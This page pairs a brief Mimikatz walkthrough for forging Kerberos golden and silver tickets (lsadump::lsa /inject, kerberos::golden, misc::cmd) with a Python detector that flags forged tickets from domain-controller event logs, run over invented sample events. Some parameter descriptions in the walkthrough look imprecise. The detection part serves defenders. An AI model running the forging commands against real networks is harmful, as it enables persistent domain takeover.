To generate a golden or silver ticket using Mimikatz, begin by running the lsadump::lsa /inject /name:$SERVICE command to retrieve the service SID and NTLM password hash for that service. If $SERVICE is krbtgt, this will allow the creation of a golden ticket; otherwise you’ll be creating a silver ticket.

(You can also use a user name instead of $SERVICE, in which case it appears that Mimikatz will just request a ticket granting ticket from the KDC as that user in the next step; this is theoretically just as noisy as a golden ticket, but looks more “normal”.)

To actually create and cache the ticket, use kerberos::golden /user:$USER /domain:$DOMAIN /sid:$SID /krbtgt:$HASH /id:$TYPE, where:

  • $USER is the user to create the ticket for (probably the one you’ve compromised).
  • $DOMAIN is the domain to create the ticket for.
  • $SID is the SID of the service from the previous step.
  • $HASH is the NT hash of the service password from the previous step.
  • $TYPE is the type of Kerberos ticket to create; use 500 for a golden (ticket-granting) ticket, and 1103 for a service ticket.

Once the ticket has been created, use misc::cmd to open a command prompt using the newly forged ticket.
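From the defender's side, the two properties the procedure above relies on are also what make a forged ticket stand out on the domain controllers: a golden ticket is never issued by the KDC, so service-ticket requests (event 4769) appear with no preceding TGT request (event 4768) from that account, and a ticket forged from an NT hash is RC4-encrypted (encryption type 0x17) even where the domain otherwise uses AES. The following is an added example, not code from the original page or from Mimikatz, that runs these two checks over a constructed set of events. It assumes a simplified dictionary representation of the 4768/4769 fields (account, client address, ticket encryption type, time); the sample events are invented for illustration.

```python
"""Heuristic detection of forged Kerberos tickets from DC security events.

Added example, not part of the original page. Works on a simplified,
constructed dict representation of Windows Security events 4768 (TGT
requested) and 4769 (service ticket requested); a real deployment would
read the same fields from EVTX/XML.
"""
from collections import defaultdict

RC4_HMAC = "0x17"             # etype produced when a ticket is forged from an NT hash
AES_TYPES = {"0x11", "0x12"}  # AES128 / AES256 as reported in TicketEncryptionType

# Constructed sample events (not real logs). Times are seconds, relative.
SAMPLE_EVENTS = [
    # Normal: TGT issued, then service tickets requested with AES.
    {"id": 4768, "account": "alice", "client": "10.0.0.5", "etype": "0x12", "time": 100},
    {"id": 4769, "account": "alice", "client": "10.0.0.5", "service": "cifs/fs01", "etype": "0x12", "time": 130},
    {"id": 4769, "account": "alice", "client": "10.0.0.5", "service": "ldap/dc01", "etype": "0x12", "time": 140},
    # Suspicious: service tickets for 'admin' with no TGT ever requested from
    # the KDC, and RC4 encryption in a domain that otherwise uses AES.
    {"id": 4769, "account": "admin", "client": "10.0.0.77", "service": "cifs/dc01", "etype": "0x17", "time": 200},
    {"id": 4769, "account": "admin", "client": "10.0.0.77", "service": "host/dc01", "etype": "0x17", "time": 205},
    # Stale: a TGT exists but is older than the correlation window.
    {"id": 4768, "account": "bob", "client": "10.0.0.8", "etype": "0x12", "time": 0},
    {"id": 4769, "account": "bob", "client": "10.0.0.8", "service": "cifs/fs01", "etype": "0x12", "time": 90000},
]


def find_forged_ticket_indicators(events, tgt_window=10 * 3600):
    """Return a list of (reason, account, client, time) findings.

    'tgs_without_tgt': a 4769 with no 4768 for the same account and client
        within tgt_window seconds before it (default 10h, the default AD TGT
        lifetime). A forged TGT is never issued by the KDC, so the 4768 is
        missing on every DC.
    'rc4_ticket': ticket encryption type RC4-HMAC in an environment assumed
        to have AES enabled; forging from an NT hash yields RC4.
    """
    tgts = defaultdict(list)  # (account, client) -> list of 4768 times
    for ev in events:
        if ev["id"] == 4768:
            tgts[(ev["account"], ev["client"])].append(ev["time"])

    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] != 4769:
            continue
        key = (ev["account"], ev["client"])
        recent = [t for t in tgts[key] if ev["time"] - tgt_window <= t <= ev["time"]]
        if not recent:
            findings.append(("tgs_without_tgt", ev["account"], ev["client"], ev["time"]))
        if ev["etype"] == RC4_HMAC:
            findings.append(("rc4_ticket", ev["account"], ev["client"], ev["time"]))
    return findings


def summarize(findings):
    """Collapse findings into {account: set(reasons)} for triage."""
    out = defaultdict(set)
    for reason, account, _client, _time in findings:
        out[account].add(reason)
    return dict(out)


if __name__ == "__main__":
    for finding in find_forged_ticket_indicators(SAMPLE_EVENTS):
        print(finding)
    print(summarize(find_forged_ticket_indicators(SAMPLE_EVENTS)))
```

The correlation catches forged TGTs because the KDC must still be asked for service tickets. A silver ticket never touches the KDC at all, so no 4768 or 4769 is written on any DC; the analogous check for it is host-side, comparing Kerberos network logons (event 4624) on the target service with the 4769 events the DCs actually recorded for that service principal.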